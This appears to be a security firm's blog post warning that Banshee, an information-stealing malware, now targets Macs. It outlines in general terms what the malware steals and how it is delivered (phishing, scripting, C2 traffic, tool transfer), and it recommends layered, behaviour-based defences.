Banshee malware now affecting Macs

We’re all familiar with the saying “an apple a day keeps the doctor away.” But in the realm of cybersecurity, a new kind of threat called banshee malware is making security experts rethink that.

Banshee malware is an information stealer that can hide itself between system processes allowing attackers to steal:

– Browser credentials

– Crypto wallet details

– Sensitive files and system info that could be used for other attacks or sold on the dark web

Banshee malware is a stealthy piece of software which blends itself in with normal computer activity, making it harder to be detected by antivirus software, allowing it to operate unnoticed. The stealth of banshee malware comes from Apple itself where malware developers have utilised code from Apple’s own malware protection system, XProtect, to help mask actions that Banshee makes.

You might be thinking that Macs don’t get viruses. It’s true that historically MacOS have faced fewer threats compared to Windows. However, due to the increasing popularity of MacBooks, they have become a much larger target. Banshee malware is a reminder that, when it comes to security, MacBooks aren’t immune. They have their own vulnerabilities and need robust, proactive defence just like any other device within your environment.

We know that Banshee malware was able to get past many common antivirus tools. While antivirus may play an important role, signature-based detection alone isn’t enough against more advanced attacks. Proactive defence that makes use of behavioural/ anomaly-based detection, regular patching, user education, and incident response is needed to keep threats at bay.

Common Tactic Techniques and Procedures attackers have used to deliver and execute banshee malware are:

Application Layer Protocol
Command and Scripting Interpreter
Phishing
Ingress Tool Transfer

Phishing

The attacker starts by launching a phishing campaign, sending emails with a malicious attachment or a link that leads to a fake login page. The goal is to trick the victim into providing credentials or downloading malware.

Command and Scripting Interpreter
Once the victim opens the malicious attachment or interacts with the phishing link, the attacker uses a command and scripting interpreter to execute commands on the compromised machine. The script could download and run additional malware or deploy a backdoor, allowing the attacker to maintain access.

Application Layer Protocol
After gaining access to the user’s machine, the attacker takes advantage of standard application layer protocols to obfuscate traffic communicating with a remote command and control C2 server. Allowing the attacker to send further commands or ex filtrate data and bypass security measures.

Ingress Tool Transfer

To further advance the attack, the attacker uses an Ingress Tool Transfer, which involves copying tools or scripts from the C2 server to the compromised system. These tools could be used to escalate privileges and for lateral movement to other machines, to collect sensitive data from the network. The transfer may also take advantage of existing obfuscated detections to avoid detection.

As we’ve seen, assuming any one platform is inherently “safe” is a recipe for disaster. Banshee malware may be the latest reason for Mac users to stay on their toes, but it certainly won’t be the last.

Get in touch to ensure you have proactive defences to keep threats at bay.

Cookie	Duration	Description
cookielawinfo-checkbox-advertisement	1 year	Set by the GDPR Cookie Consent plugin, this cookie is used to record the user consent for the cookies in the "Advertisement" category .
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Cookie	Duration	Description
IDE	1 year 24 days	Google DoubleClick IDE cookies are used to store information about how the user uses the website to present them with relevant ads and according to the user profile.
test_cookie	15 minutes	The test_cookie is set by doubleclick.net and is used to determine if the user's browser supports cookies.
VISITOR_INFO1_LIVE	5 months 27 days	A cookie set by YouTube to measure bandwidth that determines whether the user gets the new or old player interface.
YSC	session	YSC cookie is set by Youtube and is used to track the views of embedded videos on Youtube pages.
yt-remote-connected-devices	never	YouTube sets this cookie to store the video preferences of the user using embedded YouTube video.
yt-remote-device-id	never	YouTube sets this cookie to store the video preferences of the user using embedded YouTube video.

Banshee malware now affecting Macs

Get in Touch

Contact

Headquarters

Explore